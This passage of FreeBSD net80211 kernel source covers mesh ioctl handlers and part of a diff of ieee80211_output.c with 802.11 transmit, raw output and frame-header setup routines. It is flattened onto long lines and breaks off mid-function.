*frm++ = IEEE80211_ELEMID_MESHGANN; /* ie */ *frm++ = IEEE80211_MESHGANN_BASE_SZ; /* len */ *frm++ = ie->gann_flags; *frm++ = ie->gann_hopcount; *frm++ = ie->gann_ttl; IEEE80211_ADDR_COPY(frm, ie->gann_addr); frm += 6; ADDWORD(frm, ie->gann_seq); ADDSHORT(frm, ie->gann_interval); return frm; } #undef ADDSHORT #undef ADDWORD /* * Initialize any mesh-specific node state. 
*/ void ieee80211_mesh_node_init(struct ieee80211vap *vap, struct ieee80211_node *ni) { ni->ni_flags |= IEEE80211_NODE_QOS; callout_init(&ni->ni_mltimer, CALLOUT_MPSAFE); callout_init(&ni->ni_mlhtimer, CALLOUT_MPSAFE); } /* * Cleanup any mesh-specific node state. */ void ieee80211_mesh_node_cleanup(struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_mesh_state *ms = vap->iv_mesh; callout_drain(&ni->ni_mltimer); callout_drain(&ni->ni_mlhtimer); /* NB: short-circuit callbacks after mesh_vdetach */ if (vap->iv_mesh != NULL) ms->ms_ppath->mpp_peerdown(ni); } void ieee80211_parse_meshid(struct ieee80211_node *ni, const uint8_t *ie) { ni->ni_meshidlen = ie[1]; memcpy(ni->ni_meshid, ie + 2, ie[1]); } /* * Setup mesh-specific node state on neighbor discovery. */ void ieee80211_mesh_init_neighbor(struct ieee80211_node *ni, const struct ieee80211_frame *wh, const struct ieee80211_scanparams *sp) { ieee80211_parse_meshid(ni, sp->meshid); } void ieee80211_mesh_update_beacon(struct ieee80211vap *vap, struct ieee80211_beacon_offsets *bo) { KASSERT(vap->iv_opmode == IEEE80211_M_MBSS, ("not a MBSS vap")); if (isset(bo->bo_flags, IEEE80211_BEACON_MESHCONF)) { (void)ieee80211_add_meshconf(bo->bo_meshconf, vap); clrbit(bo->bo_flags, IEEE80211_BEACON_MESHCONF); } } static int mesh_ioctl_get80211(struct ieee80211vap *vap, struct ieee80211req *ireq) { struct ieee80211_mesh_state *ms = vap->iv_mesh; uint8_t tmpmeshid[IEEE80211_NWID_LEN]; struct ieee80211_mesh_route *rt; struct ieee80211req_mesh_route *imr; size_t len, off; uint8_t *p; int error; if (vap->iv_opmode != IEEE80211_M_MBSS) return ENOSYS; error = 0; switch (ireq->i_type) { case IEEE80211_IOC_MESH_ID: ireq->i_len = ms->ms_idlen; memcpy(tmpmeshid, ms->ms_id, ireq->i_len); error = copyout(tmpmeshid, ireq->i_data, ireq->i_len); break; case IEEE80211_IOC_MESH_AP: ireq->i_val = (ms->ms_flags & IEEE80211_MESHFLAGS_AP) != 0; break; case IEEE80211_IOC_MESH_FWRD: ireq->i_val = (ms->ms_flags & IEEE80211_MESHFLAGS_FWD) != 0; break; case IEEE80211_IOC_MESH_GATE: ireq->i_val = (ms->ms_flags & IEEE80211_MESHFLAGS_GATE) != 0; break; case IEEE80211_IOC_MESH_TTL: ireq->i_val = ms->ms_ttl; break; case IEEE80211_IOC_MESH_RTCMD: switch (ireq->i_val) { case IEEE80211_MESH_RTCMD_LIST: len = 0; MESH_RT_LOCK(ms); TAILQ_FOREACH(rt, &ms->ms_routes, rt_next) { len += sizeof(*imr); } MESH_RT_UNLOCK(ms); if (len > ireq->i_len || ireq->i_len < sizeof(*imr)) { ireq->i_len = len; return ENOMEM; } ireq->i_len = len; /* XXX M_WAIT? 
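 * Editorial note: the route table is walked twice, once above to size
 * the copyout buffer and once below to fill it; the "off >= len" check
 * in the second pass guards against the table having grown in between.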
*/ p = malloc(len, M_TEMP, M_NOWAIT | M_ZERO); if (p == NULL) return ENOMEM; off = 0; MESH_RT_LOCK(ms); TAILQ_FOREACH(rt, &ms->ms_routes, rt_next) { if (off >= len) break; imr = (struct ieee80211req_mesh_route *) (p + off); IEEE80211_ADDR_COPY(imr->imr_dest, rt->rt_dest); IEEE80211_ADDR_COPY(imr->imr_nexthop, rt->rt_nexthop); imr->imr_metric = rt->rt_metric; imr->imr_nhops = rt->rt_nhops; imr->imr_lifetime = ieee80211_mesh_rt_update(rt, 0); imr->imr_lastmseq = rt->rt_lastmseq; imr->imr_flags = rt->rt_flags; /* last */ off += sizeof(*imr); } MESH_RT_UNLOCK(ms); error = copyout(p, (uint8_t *)ireq->i_data, ireq->i_len); free(p, M_TEMP); break; case IEEE80211_MESH_RTCMD_FLUSH: case IEEE80211_MESH_RTCMD_ADD: case IEEE80211_MESH_RTCMD_DELETE: return EINVAL; default: return ENOSYS; } break; case IEEE80211_IOC_MESH_PR_METRIC: len = strlen(ms->ms_pmetric->mpm_descr); if (ireq->i_len < len) return EINVAL; ireq->i_len = len; error = copyout(ms->ms_pmetric->mpm_descr, (uint8_t *)ireq->i_data, len); break; case IEEE80211_IOC_MESH_PR_PATH: len = strlen(ms->ms_ppath->mpp_descr); if (ireq->i_len < len) return EINVAL; ireq->i_len = len; error = copyout(ms->ms_ppath->mpp_descr, (uint8_t *)ireq->i_data, len); break; default: return ENOSYS; } return error; } IEEE80211_IOCTL_GET(mesh, mesh_ioctl_get80211); static int mesh_ioctl_set80211(struct ieee80211vap *vap, struct ieee80211req *ireq) { struct ieee80211_mesh_state *ms = vap->iv_mesh; uint8_t tmpmeshid[IEEE80211_NWID_LEN]; uint8_t tmpaddr[IEEE80211_ADDR_LEN]; char tmpproto[IEEE80211_MESH_PROTO_DSZ]; int error; if (vap->iv_opmode != IEEE80211_M_MBSS) return ENOSYS; error = 0; switch (ireq->i_type) { case IEEE80211_IOC_MESH_ID: if (ireq->i_val != 0 || ireq->i_len > IEEE80211_MESHID_LEN) return EINVAL; error = copyin(ireq->i_data, tmpmeshid, ireq->i_len); if (error != 0) break; memset(ms->ms_id, 0, IEEE80211_NWID_LEN); ms->ms_idlen = ireq->i_len; memcpy(ms->ms_id, tmpmeshid, ireq->i_len); error = ENETRESET; break; case IEEE80211_IOC_MESH_AP: if (ireq->i_val) ms->ms_flags |= IEEE80211_MESHFLAGS_AP; else ms->ms_flags &= ~IEEE80211_MESHFLAGS_AP; error = ENETRESET; break; case IEEE80211_IOC_MESH_FWRD: if (ireq->i_val) ms->ms_flags |= IEEE80211_MESHFLAGS_FWD; else ms->ms_flags &= ~IEEE80211_MESHFLAGS_FWD; mesh_gatemode_setup(vap); break; case IEEE80211_IOC_MESH_GATE: if (ireq->i_val) ms->ms_flags |= IEEE80211_MESHFLAGS_GATE; else ms->ms_flags &= ~IEEE80211_MESHFLAGS_GATE; break; case IEEE80211_IOC_MESH_TTL: ms->ms_ttl = (uint8_t) ireq->i_val; break; case IEEE80211_IOC_MESH_RTCMD: switch (ireq->i_val) { case IEEE80211_MESH_RTCMD_LIST: return EINVAL; case IEEE80211_MESH_RTCMD_FLUSH: ieee80211_mesh_rt_flush(vap); break; case IEEE80211_MESH_RTCMD_ADD: if (IEEE80211_ADDR_EQ(vap->iv_myaddr, ireq->i_data) || IEEE80211_ADDR_EQ(broadcastaddr, ireq->i_data)) return EINVAL; error = copyin(ireq->i_data, &tmpaddr, IEEE80211_ADDR_LEN); if (error == 0) ieee80211_mesh_discover(vap, tmpaddr, NULL); break; case IEEE80211_MESH_RTCMD_DELETE: ieee80211_mesh_rt_del(vap, ireq->i_data); break; default: return ENOSYS; } break; case IEEE80211_IOC_MESH_PR_METRIC: error = copyin(ireq->i_data, tmpproto, sizeof(tmpproto)); if (error == 0) { error = mesh_select_proto_metric(vap, tmpproto); if (error == 0) error = ENETRESET; } break; case IEEE80211_IOC_MESH_PR_PATH: error = copyin(ireq->i_data, tmpproto, sizeof(tmpproto)); if (error == 0) { error = mesh_select_proto_path(vap, tmpproto); if (error == 0) error = ENETRESET; } break; default: return ENOSYS; } return error; } IEEE80211_IOCTL_SET(mesh, 
mesh_ioctl_set80211); diff --git a/sys/net80211/ieee80211_output.c b/sys/net80211/ieee80211_output.c index f75820340389..c6730cbc4af4 100644 --- a/sys/net80211/ieee80211_output.c +++ b/sys/net80211/ieee80211_output.c @@ -1,3407 +1,3407 @@ /*- * Copyright (c) 2001 Atsushi Onoe * Copyright (c) 2002-2009 Sam Leffler, Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include __FBSDID("$FreeBSD$"); #include "opt_inet.h" #include "opt_inet6.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef IEEE80211_SUPPORT_SUPERG #include #endif #ifdef IEEE80211_SUPPORT_TDMA #include #endif #include #include #if defined(INET) || defined(INET6) #include #endif #ifdef INET #include #include #include #endif #ifdef INET6 #include #endif #include #define ETHER_HEADER_COPY(dst, src) \ memcpy(dst, src, sizeof(struct ether_header)) /* unalligned little endian access */ #define LE_WRITE_2(p, v) do { \ ((uint8_t *)(p))[0] = (v) & 0xff; \ ((uint8_t *)(p))[1] = ((v) >> 8) & 0xff; \ } while (0) #define LE_WRITE_4(p, v) do { \ ((uint8_t *)(p))[0] = (v) & 0xff; \ ((uint8_t *)(p))[1] = ((v) >> 8) & 0xff; \ ((uint8_t *)(p))[2] = ((v) >> 16) & 0xff; \ ((uint8_t *)(p))[3] = ((v) >> 24) & 0xff; \ } while (0) static int ieee80211_fragment(struct ieee80211vap *, struct mbuf *, u_int hdrsize, u_int ciphdrsize, u_int mtu); static void ieee80211_tx_mgt_cb(struct ieee80211_node *, void *, int); #ifdef IEEE80211_DEBUG /* * Decide if an outbound management frame should be * printed when debugging is enabled. This filters some * of the less interesting frames that come frequently * (e.g. beacons). */ static __inline int doprint(struct ieee80211vap *vap, int subtype) { switch (subtype) { case IEEE80211_FC0_SUBTYPE_PROBE_RESP: return (vap->iv_opmode == IEEE80211_M_IBSS); } return 1; } #endif /* * Transmit a frame to the given destination on the given VAP. * * It's up to the caller to figure out the details of who this * is going to and resolving the node. * * This routine takes care of queuing it for power save, * A-MPDU state stuff, fast-frames state stuff, encapsulation * if required, then passing it up to the driver layer. 
* * This routine (for now) consumes the mbuf and frees the node * reference; it ideally will return a TX status which reflects * whether the mbuf was consumed or not, so the caller can * free the mbuf (if appropriate) and the node reference (again, * if appropriate.) */ int ieee80211_vap_pkt_send_dest(struct ieee80211vap *vap, struct mbuf *m, struct ieee80211_node *ni) { struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = vap->iv_ifp; int error; if ((ni->ni_flags & IEEE80211_NODE_PWR_MGT) && (m->m_flags & M_PWR_SAV) == 0) { /* * Station in power save mode; pass the frame * to the 802.11 layer and continue. We'll get * the frame back when the time is right. * XXX lose WDS vap linkage? */ (void) ieee80211_pwrsave(ni, m); ieee80211_free_node(ni); /* * We queued it fine, so tell the upper layer * that we consumed it. */ return (0); } /* calculate priority so drivers can find the tx queue */ if (ieee80211_classify(ni, m)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_OUTPUT, ni->ni_macaddr, NULL, "%s", "classification failure"); vap->iv_stats.is_tx_classify++; ifp->if_oerrors++; m_freem(m); ieee80211_free_node(ni); /* XXX better status? */ return (0); } /* * Stash the node pointer. Note that we do this after * any call to ieee80211_dwds_mcast because that code * uses any existing value for rcvif to identify the * interface it (might have been) received on. */ m->m_pkthdr.rcvif = (void *)ni; BPF_MTAP(ifp, m); /* 802.3 tx */ /* * Check if A-MPDU tx aggregation is setup or if we * should try to enable it. The sta must be associated * with HT and A-MPDU enabled for use. When the policy * routine decides we should enable A-MPDU we issue an * ADDBA request and wait for a reply. The frame being * encapsulated will go out w/o using A-MPDU, or possibly * it might be collected by the driver and held/retransmit. * The default ic_ampdu_enable routine handles staggering * ADDBA requests in case the receiver NAK's us or we are * otherwise unable to establish a BA stream. */ if ((ni->ni_flags & IEEE80211_NODE_AMPDU_TX) && (vap->iv_flags_ht & IEEE80211_FHT_AMPDU_TX) && (m->m_flags & M_EAPOL) == 0) { int tid = WME_AC_TO_TID(M_WME_GETAC(m)); struct ieee80211_tx_ampdu *tap = &ni->ni_tx_ampdu[tid]; ieee80211_txampdu_count_packet(tap); if (IEEE80211_AMPDU_RUNNING(tap)) { /* * Operational, mark frame for aggregation. * * XXX do tx aggregation here */ m->m_flags |= M_AMPDU_MPDU; } else if (!IEEE80211_AMPDU_REQUESTED(tap) && ic->ic_ampdu_enable(ni, tap)) { /* * Not negotiated yet, request service. */ ieee80211_ampdu_request(ni, tap); /* XXX hold frame for reply? */ } } #ifdef IEEE80211_SUPPORT_SUPERG else if (IEEE80211_ATH_CAP(vap, ni, IEEE80211_NODE_FF)) { m = ieee80211_ff_check(ni, m); if (m == NULL) { /* NB: any ni ref held on stageq */ return (0); } } #endif /* IEEE80211_SUPPORT_SUPERG */ /* * Grab the TX lock - serialise the TX process from this * point (where TX state is being checked/modified) * through to driver queue. */ IEEE80211_TX_LOCK(ic); if (__predict_true((vap->iv_caps & IEEE80211_C_8023ENCAP) == 0)) { /* * Encapsulate the packet in prep for transmission. */ m = ieee80211_encap(vap, ni, m); if (m == NULL) { /* NB: stat+msg handled in ieee80211_encap */ IEEE80211_TX_UNLOCK(ic); ieee80211_free_node(ni); /* XXX better status? 
*/ return (ENOBUFS); } } error = ieee80211_parent_xmitpkt(ic, m); /* * Unlock at this point - no need to hold it across * ieee80211_free_node() (ie, the comlock) */ IEEE80211_TX_UNLOCK(ic); if (error != 0) { /* NB: IFQ_HANDOFF reclaims mbuf */ ieee80211_free_node(ni); } else { ifp->if_opackets++; } ic->ic_lastdata = ticks; return (0); } /* * Send the given mbuf through the given vap. * * This consumes the mbuf regardless of whether the transmit * was successful or not. * * This does none of the initial checks that ieee80211_start() * does (eg CAC timeout, interface wakeup) - the caller must * do this first. */ static int ieee80211_start_pkt(struct ieee80211vap *vap, struct mbuf *m) { #define IS_DWDS(vap) \ (vap->iv_opmode == IEEE80211_M_WDS && \ (vap->iv_flags_ext & IEEE80211_FEXT_WDSLEGACY) == 0) struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = vap->iv_ifp; struct ieee80211_node *ni; struct ether_header *eh; /* * Cancel any background scan. */ if (ic->ic_flags & IEEE80211_F_SCAN) ieee80211_cancel_anyscan(vap); /* * Find the node for the destination so we can do * things like power save and fast frames aggregation. * * NB: past this point various code assumes the first * mbuf has the 802.3 header present (and contiguous). */ ni = NULL; if (m->m_len < sizeof(struct ether_header) && (m = m_pullup(m, sizeof(struct ether_header))) == NULL) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_OUTPUT, "discard frame, %s\n", "m_pullup failed"); vap->iv_stats.is_tx_nobuf++; /* XXX */ ifp->if_oerrors++; return (ENOBUFS); } eh = mtod(m, struct ether_header *); if (ETHER_IS_MULTICAST(eh->ether_dhost)) { if (IS_DWDS(vap)) { /* * Only unicast frames from the above go out * DWDS vaps; multicast frames are handled by * dispatching the frame as it comes through * the AP vap (see below). */ IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_WDS, eh->ether_dhost, "mcast", "%s", "on DWDS"); vap->iv_stats.is_dwds_mcast++; m_freem(m); /* XXX better status? */ return (ENOBUFS); } if (vap->iv_opmode == IEEE80211_M_HOSTAP) { /* * Spam DWDS vap's w/ multicast traffic. */ /* XXX only if dwds in use? */ ieee80211_dwds_mcast(vap, m); } } #ifdef IEEE80211_SUPPORT_MESH if (vap->iv_opmode != IEEE80211_M_MBSS) { #endif ni = ieee80211_find_txnode(vap, eh->ether_dhost); if (ni == NULL) { /* NB: ieee80211_find_txnode does stat+msg */ ifp->if_oerrors++; m_freem(m); /* XXX better status? */ return (ENOBUFS); } if (ni->ni_associd == 0 && (ni->ni_flags & IEEE80211_NODE_ASSOCID)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_OUTPUT, eh->ether_dhost, NULL, "sta not associated (type 0x%04x)", htons(eh->ether_type)); vap->iv_stats.is_tx_notassoc++; ifp->if_oerrors++; m_freem(m); ieee80211_free_node(ni); /* XXX better status? */ return (ENOBUFS); } #ifdef IEEE80211_SUPPORT_MESH } else { if (!IEEE80211_ADDR_EQ(eh->ether_shost, vap->iv_myaddr)) { /* * Proxy station only if configured. */ if (!ieee80211_mesh_isproxyena(vap)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_OUTPUT | IEEE80211_MSG_MESH, eh->ether_dhost, NULL, "%s", "proxy not enabled"); vap->iv_stats.is_mesh_notproxy++; ifp->if_oerrors++; m_freem(m); /* XXX better status? */ return (ENOBUFS); } IEEE80211_DPRINTF(vap, IEEE80211_MSG_OUTPUT, "forward frame from DS SA(%6D), DA(%6D)\n", eh->ether_shost, ":", eh->ether_dhost, ":"); ieee80211_mesh_proxy_check(vap, eh->ether_shost); } ni = ieee80211_mesh_discover(vap, eh->ether_dhost, m); if (ni == NULL) { /* * NB: ieee80211_mesh_discover holds/disposes * frame (e.g. queueing on path discovery). */ ifp->if_oerrors++; /* XXX better status? 
*/ return (ENOBUFS); } } #endif /* * We've resolved the sender, so attempt to transmit it. */ if (ieee80211_vap_pkt_send_dest(vap, m, ni) != 0) return (ENOBUFS); return (0); #undef IS_DWDS } /* * Start method for vap's. All packets from the stack come * through here. We handle common processing of the packets * before dispatching them to the underlying device. * * if_transmit() requires that the mbuf be consumed by this call * regardless of the return condition. */ int ieee80211_vap_transmit(struct ifnet *ifp, struct mbuf *m) { struct ieee80211vap *vap = ifp->if_softc; struct ieee80211com *ic = vap->iv_ic; struct ifnet *parent = ic->ic_ifp; /* NB: parent must be up and running */ if (!IFNET_IS_UP_RUNNING(parent)) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_OUTPUT, "%s: ignore queue, parent %s not up+running\n", __func__, parent->if_xname); /* XXX stat */ m_freem(m); return (EINVAL); } if (vap->iv_state == IEEE80211_S_SLEEP) { /* * In power save, wakeup device for transmit. */ ieee80211_new_state(vap, IEEE80211_S_RUN, 0); m_freem(m); return (0); } /* * No data frames go out unless we're running. * Note in particular this covers CAC and CSA * states (though maybe we should check muting * for CSA). */ if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_LOCK(ic); /* re-check under the com lock to avoid races */ if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_OUTPUT, "%s: ignore queue, in %s state\n", __func__, ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_tx_badstate++; IEEE80211_UNLOCK(ic); ifp->if_drv_flags |= IFF_DRV_OACTIVE; m_freem(m); return (EINVAL); } IEEE80211_UNLOCK(ic); } /* * Sanitize mbuf flags for net80211 use. We cannot * clear M_PWR_SAV or M_MORE_DATA because these may * be set for frames that are re-submitted from the * power save queue. * * NB: This must be done before ieee80211_classify as * it marks EAPOL in frames with M_EAPOL. */ m->m_flags &= ~(M_80211_TX - M_PWR_SAV - M_MORE_DATA); /* * Bump to the packet transmission path. * The mbuf will be consumed here. */ return (ieee80211_start_pkt(vap, m)); } void ieee80211_vap_qflush(struct ifnet *ifp) { /* Empty for now */ } /* * 802.11 raw output routine. */ int ieee80211_raw_output(struct ieee80211vap *vap, struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = vap->iv_ic; return (ic->ic_raw_xmit(ni, m, params)); } /* * 802.11 output routine. This is (currently) used only to * connect bpf write calls to the 802.11 layer for injecting * raw 802.11 frames. */ #if __FreeBSD_version >= 1000031 int ieee80211_output(struct ifnet *ifp, struct mbuf *m, const struct sockaddr *dst, struct route *ro) #else int ieee80211_output(struct ifnet *ifp, struct mbuf *m, struct sockaddr *dst, struct route *ro) #endif { #define senderr(e) do { error = (e); goto bad;} while (0) struct ieee80211_node *ni = NULL; struct ieee80211vap *vap; struct ieee80211_frame *wh; struct ieee80211com *ic = NULL; int error; int ret; if (ifp->if_drv_flags & IFF_DRV_OACTIVE) { /* * Short-circuit requests if the vap is marked OACTIVE * as this can happen because a packet came down through * ieee80211_start before the vap entered RUN state in * which case it's ok to just drop the frame. This * should not be necessary but callers of if_output don't * check OACTIVE. */ senderr(ENETDOWN); } vap = ifp->if_softc; ic = vap->iv_ic; /* * Hand to the 802.3 code if not tagged as * a raw 802.11 frame. 
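 * (Editorial addition.) Raw injection, e.g. a bpf write with
 * DLT_IEEE802_11_RADIO, marks the sockaddr with AF_IEEE80211; anything
 * else is handed back to the normal Ethernet output path.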
*/ if (dst->sa_family != AF_IEEE80211) return vap->iv_output(ifp, m, dst, ro); #ifdef MAC error = mac_ifnet_check_transmit(ifp, m); if (error) senderr(error); #endif if (ifp->if_flags & IFF_MONITOR) senderr(ENETDOWN); if (!IFNET_IS_UP_RUNNING(ifp)) senderr(ENETDOWN); if (vap->iv_state == IEEE80211_S_CAC) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_OUTPUT | IEEE80211_MSG_DOTH, "block %s frame in CAC state\n", "raw data"); vap->iv_stats.is_tx_badstate++; senderr(EIO); /* XXX */ } else if (vap->iv_state == IEEE80211_S_SCAN) senderr(EIO); /* XXX bypass bridge, pfil, carp, etc. */ if (m->m_pkthdr.len < sizeof(struct ieee80211_frame_ack)) senderr(EIO); /* XXX */ wh = mtod(m, struct ieee80211_frame *); if ((wh->i_fc[0] & IEEE80211_FC0_VERSION_MASK) != IEEE80211_FC0_VERSION_0) senderr(EIO); /* XXX */ /* locate destination node */ switch (wh->i_fc[1] & IEEE80211_FC1_DIR_MASK) { case IEEE80211_FC1_DIR_NODS: case IEEE80211_FC1_DIR_FROMDS: ni = ieee80211_find_txnode(vap, wh->i_addr1); break; case IEEE80211_FC1_DIR_TODS: case IEEE80211_FC1_DIR_DSTODS: if (m->m_pkthdr.len < sizeof(struct ieee80211_frame)) senderr(EIO); /* XXX */ ni = ieee80211_find_txnode(vap, wh->i_addr3); break; default: senderr(EIO); /* XXX */ } if (ni == NULL) { /* * Permit packets w/ bpf params through regardless * (see below about sa_len). */ if (dst->sa_len == 0) senderr(EHOSTUNREACH); ni = ieee80211_ref_node(vap->iv_bss); } /* * Sanitize mbuf for net80211 flags leaked from above. * * NB: This must be done before ieee80211_classify as * it marks EAPOL in frames with M_EAPOL. */ m->m_flags &= ~M_80211_TX; /* calculate priority so drivers can find the tx queue */ /* XXX assumes an 802.3 frame */ if (ieee80211_classify(ni, m)) senderr(EIO); /* XXX */ ifp->if_opackets++; IEEE80211_NODE_STAT(ni, tx_data); if (IEEE80211_IS_MULTICAST(wh->i_addr1)) { IEEE80211_NODE_STAT(ni, tx_mcast); m->m_flags |= M_MCAST; } else IEEE80211_NODE_STAT(ni, tx_ucast); /* NB: ieee80211_encap does not include 802.11 header */ IEEE80211_NODE_STAT_ADD(ni, tx_bytes, m->m_pkthdr.len); IEEE80211_TX_LOCK(ic); /* * NB: DLT_IEEE802_11_RADIO identifies the parameters are * present by setting the sa_len field of the sockaddr (yes, * this is a hack). * NB: we assume sa_data is suitably aligned to cast. */ ret = ieee80211_raw_output(vap, ni, m, (const struct ieee80211_bpf_params *)(dst->sa_len ? dst->sa_data : NULL)); IEEE80211_TX_UNLOCK(ic); return (ret); bad: if (m != NULL) m_freem(m); if (ni != NULL) ieee80211_free_node(ni); ifp->if_oerrors++; return error; #undef senderr } /* * Set the direction field and address fields of an outgoing * frame. Note this should be called early on in constructing * a frame as it sets i_fc[1]; other bits can then be or'd in. 
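 * (Editorial addition.) For data frames the address fields follow the
 * usual ToDS/FromDS layout:
 *
 *	dir	addr1	addr2	addr3	addr4
 *	NODS	DA	SA	BSSID	-
 *	TODS	BSSID	SA	DA	-
 *	FROMDS	DA	BSSID	SA	-
 *	DSTODS	RA	TA	DA	SA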
*/ void ieee80211_send_setup( struct ieee80211_node *ni, struct mbuf *m, int type, int tid, const uint8_t sa[IEEE80211_ADDR_LEN], const uint8_t da[IEEE80211_ADDR_LEN], const uint8_t bssid[IEEE80211_ADDR_LEN]) { #define WH4(wh) ((struct ieee80211_frame_addr4 *)wh) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_tx_ampdu *tap; struct ieee80211_frame *wh = mtod(m, struct ieee80211_frame *); ieee80211_seq seqno; IEEE80211_TX_LOCK_ASSERT(ni->ni_ic); wh->i_fc[0] = IEEE80211_FC0_VERSION_0 | type; if ((type & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_DATA) { switch (vap->iv_opmode) { case IEEE80211_M_STA: wh->i_fc[1] = IEEE80211_FC1_DIR_TODS; IEEE80211_ADDR_COPY(wh->i_addr1, bssid); IEEE80211_ADDR_COPY(wh->i_addr2, sa); IEEE80211_ADDR_COPY(wh->i_addr3, da); break; case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: wh->i_fc[1] = IEEE80211_FC1_DIR_NODS; IEEE80211_ADDR_COPY(wh->i_addr1, da); IEEE80211_ADDR_COPY(wh->i_addr2, sa); IEEE80211_ADDR_COPY(wh->i_addr3, bssid); break; case IEEE80211_M_HOSTAP: wh->i_fc[1] = IEEE80211_FC1_DIR_FROMDS; IEEE80211_ADDR_COPY(wh->i_addr1, da); IEEE80211_ADDR_COPY(wh->i_addr2, bssid); IEEE80211_ADDR_COPY(wh->i_addr3, sa); break; case IEEE80211_M_WDS: wh->i_fc[1] = IEEE80211_FC1_DIR_DSTODS; IEEE80211_ADDR_COPY(wh->i_addr1, da); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); IEEE80211_ADDR_COPY(wh->i_addr3, da); IEEE80211_ADDR_COPY(WH4(wh)->i_addr4, sa); break; case IEEE80211_M_MBSS: #ifdef IEEE80211_SUPPORT_MESH if (IEEE80211_IS_MULTICAST(da)) { wh->i_fc[1] = IEEE80211_FC1_DIR_FROMDS; /* XXX next hop */ IEEE80211_ADDR_COPY(wh->i_addr1, da); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); } else { wh->i_fc[1] = IEEE80211_FC1_DIR_DSTODS; IEEE80211_ADDR_COPY(wh->i_addr1, da); IEEE80211_ADDR_COPY(wh->i_addr2, vap->iv_myaddr); IEEE80211_ADDR_COPY(wh->i_addr3, da); IEEE80211_ADDR_COPY(WH4(wh)->i_addr4, sa); } #endif break; case IEEE80211_M_MONITOR: /* NB: to quiet compiler */ break; } } else { wh->i_fc[1] = IEEE80211_FC1_DIR_NODS; IEEE80211_ADDR_COPY(wh->i_addr1, da); IEEE80211_ADDR_COPY(wh->i_addr2, sa); #ifdef IEEE80211_SUPPORT_MESH if (vap->iv_opmode == IEEE80211_M_MBSS) IEEE80211_ADDR_COPY(wh->i_addr3, sa); else #endif IEEE80211_ADDR_COPY(wh->i_addr3, bssid); } *(uint16_t *)&wh->i_dur[0] = 0; tap = &ni->ni_tx_ampdu[tid]; if (tid != IEEE80211_NONQOS_TID && IEEE80211_AMPDU_RUNNING(tap)) m->m_flags |= M_AMPDU_MPDU; else { seqno = ni->ni_txseqs[tid]++; *(uint16_t *)&wh->i_seq[0] = htole16(seqno << IEEE80211_SEQ_SEQ_SHIFT); M_SEQNO_SET(m, seqno); } if (IEEE80211_IS_MULTICAST(wh->i_addr1)) m->m_flags |= M_MCAST; #undef WH4 } /* * Send a management frame to the specified node. The node pointer * must have a reference as the pointer will be passed to the driver * and potentially held for a long time. If the frame is successfully * dispatched to the driver, then it is responsible for freeing the * reference (and potentially free'ing up any associated storage); * otherwise deal with reclaiming any reference (on error). 
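 * (Editorial addition.) If the caller passes IEEE80211_BPF_CRYPTO the
 * Protected (formerly WEP) bit is set in i_fc[1]; the actual
 * encryption is left to the crypto layer/driver on the way out.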
*/ int ieee80211_mgmt_output(struct ieee80211_node *ni, struct mbuf *m, int type, struct ieee80211_bpf_params *params) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; int ret; KASSERT(ni != NULL, ("null node")); if (vap->iv_state == IEEE80211_S_CAC) { IEEE80211_NOTE(vap, IEEE80211_MSG_OUTPUT | IEEE80211_MSG_DOTH, ni, "block %s frame in CAC state", ieee80211_mgt_subtype_name[ (type & IEEE80211_FC0_SUBTYPE_MASK) >> IEEE80211_FC0_SUBTYPE_SHIFT]); vap->iv_stats.is_tx_badstate++; ieee80211_free_node(ni); m_freem(m); return EIO; /* XXX */ } M_PREPEND(m, sizeof(struct ieee80211_frame), M_NOWAIT); if (m == NULL) { ieee80211_free_node(ni); return ENOMEM; } IEEE80211_TX_LOCK(ic); wh = mtod(m, struct ieee80211_frame *); ieee80211_send_setup(ni, m, IEEE80211_FC0_TYPE_MGT | type, IEEE80211_NONQOS_TID, vap->iv_myaddr, ni->ni_macaddr, ni->ni_bssid); if (params->ibp_flags & IEEE80211_BPF_CRYPTO) { IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_AUTH, wh->i_addr1, "encrypting frame 